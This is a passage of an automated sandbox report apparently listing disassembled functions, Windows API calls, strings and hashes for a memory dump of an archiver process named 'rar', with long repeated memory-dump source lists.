                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                                                                                                                                                                                              • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                                                                                                                                                                                              • API String ID: 3483800833-4165214152
                                                                                                                                                                                                                              • Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                              • Instruction ID: 588399884adba2e00015e50f9ce868be3f9049c3eea03270400bb4e99df79805
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54C18F32A09B8286EB14DF29D8542AD67B0FF88B94F444135EB4E87BA5DF3CD549C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                              • API String ID: 3729174658-3733053543
                                                                                                                                                                                                                              • Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                              • Instruction ID: 563f0a1313ffdf245ab9162737d426db1c13c9ecb28f4a761ec2960c5a460f81
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07218132A18A4286FB98DB68E46937E6361FB9C744F905135DB4E86974CF3DD449C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF6BBCB2014), ref: 00007FF6BBCCE298
                                                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,00000001,?,00007FF6BBCB2014), ref: 00007FF6BBCCE2AB
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF6BBCB2014), ref: 00007FF6BBCCE2F7
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6BBCCEE47), ref: 00007FF6BBCCEF73
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6BBCCEE47), ref: 00007FF6BBCCEF84
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6BBCCEFA7
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6BBCCEFCA
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: GetLastError.KERNEL32 ref: 00007FF6BBCCEFD4
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: CloseHandle.KERNEL32 ref: 00007FF6BBCCEFE7
                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00007FF6BBCCE357
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF6BBCB2014), ref: 00007FF6BBCCE362
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                              • String ID: SeBackupPrivilege
                                                                                                                                                                                                                              • API String ID: 3094086963-2429070247
                                                                                                                                                                                                                              • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                              • Instruction ID: 0b238bbe06d28b98be81a7bd60b50861306a80db286d649ceafec92856baf082
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F61B032A0868286E728DF69E4582ED23B0FB5D794F804235DB6E97AE5CF3CE155C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleepswprintf
                                                                                                                                                                                                                              • String ID: $%ls%0*u.rev
                                                                                                                                                                                                                              • API String ID: 407366315-3491873314
                                                                                                                                                                                                                              • Opcode ID: 782f304219662b4eecf027b144e7046621da4246e6178cffb5e29678f0c5f42f
                                                                                                                                                                                                                              • Instruction ID: 27c9852247dc89f923514e31e8764e9ffac2658e9f66d5f5d61947ef4fffcd5f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 782f304219662b4eecf027b144e7046621da4246e6178cffb5e29678f0c5f42f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0902C032A1868286EB24DB29E4896BE63B5FB8C784F410135DF5D8B7A9DF3CE445C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • new.LIBCMT ref: 00007FF6BBCB4BD8
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCFB6D0: Sleep.KERNEL32(?,?,?,?,00007FF6BBCCCBED,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCFB730
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD1E80: CreateFileW.KERNELBASE ref: 00007FF6BBCD1F4A
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD1E80: GetLastError.KERNEL32 ref: 00007FF6BBCD1F59
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD1E80: CreateFileW.KERNELBASE ref: 00007FF6BBCD1F99
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD1E80: GetLastError.KERNEL32 ref: 00007FF6BBCD1FA2
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD1E80: SetFileTime.KERNEL32 ref: 00007FF6BBCD1FF1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast$SleepTime
                                                                                                                                                                                                                              • String ID: %12s %s$%12s %s$ $%s
                                                                                                                                                                                                                              • API String ID: 2965465231-221484280
                                                                                                                                                                                                                              • Opcode ID: 243e240d92035203585a04358195e9a1f419bc689fbc130788e8de5a1c1be098
                                                                                                                                                                                                                              • Instruction ID: 446b3b12e8b82844f66b3237aafa7339b1037fbbc35600e217d62557634abff6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 243e240d92035203585a04358195e9a1f419bc689fbc130788e8de5a1c1be098
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCF1BD22B0DA8A86EA70DB1AE0582BE63B1FB8DB84F840435DB4D877A5DF3CD555C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                              • Instruction ID: e218a78f696793cf3f22fb9cce14a81a6388ea0d262e31333ce93723555dbc80
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3316436618F818ADB64CF29E8502AE73A4FB88754F540635EB9D83B69DF3CD145CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3398352648-0
                                                                                                                                                                                                                              • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                              • Instruction ID: eaceaf08658ab616f56edf132a9b449bbf9133e79fc56e08e1f284935897c345
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC113032618B8286E754CF25E45456AB7B4FB8CB80F545535EB8E83A28DF3CE045CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3116915952-0
                                                                                                                                                                                                                              • Opcode ID: 8527d030e3cc7ba1d2d2188fa28773b5d1ef2776714c206f3930b60042c0ccec
                                                                                                                                                                                                                              • Instruction ID: b97b423a1325c91305586c91663740d74528d4d27d8c188e9b7ccb208e60e9c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8527d030e3cc7ba1d2d2188fa28773b5d1ef2776714c206f3930b60042c0ccec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42E15D26A1CA8A82EA24EB29E4585FD2775FB8D784F445032DF4D8B7A6DF3CE505C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,00007FF6BBCD11B0,?,?,?,00000000,?,?,00007FF6BBCCF30F,00000000,00007FF6BBCB6380,?,00007FF6BBCB2EC8), ref: 00007FF6BBCD3AC4
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,00007FF6BBCD11B0,?,?,?,00000000,?,?,00007FF6BBCCF30F,00000000,00007FF6BBCB6380,?,00007FF6BBCB2EC8), ref: 00007FF6BBCD3B0A
                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00007FF6BBCD3B55
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00007FF6BBCD11B0,?,?,?,00000000,?,?,00007FF6BBCCF30F,00000000,00007FF6BBCB6380,?,00007FF6BBCB2EC8), ref: 00007FF6BBCD3B60
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile$CloseControlDeviceHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 998109204-0
                                                                                                                                                                                                                              • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                              • Instruction ID: 4ecc1b57a8dbd158b76502ad7a97ee5c11b94c25cfccf6913f8123103abba417
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA316B36618B8186E7648F55F4446AAB7A4FB887E4F100336EBA953BE8CF3CD5558B00
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: CMT
                                                                                                                                                                                                                              • API String ID: 0-2756464174
                                                                                                                                                                                                                              • Opcode ID: cbae23b477236efd5552a84d69818ed097b452cbaf440f48f7b5ba52d2a69677
                                                                                                                                                                                                                              • Instruction ID: 1d5e5bc9ac82fd6f4391598fc0eddf475ae500dd8cc49e39542667d04754b506
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbae23b477236efd5552a84d69818ed097b452cbaf440f48f7b5ba52d2a69677
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92D1CF62A1868686EA34EB29D4581BD63B0FF8DB80F544532DB9E876F5DF3CE541C304
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BBD18704
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBD14E3C: GetCurrentProcess.KERNEL32(00007FF6BBD19CC5), ref: 00007FF6BBD14E69
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
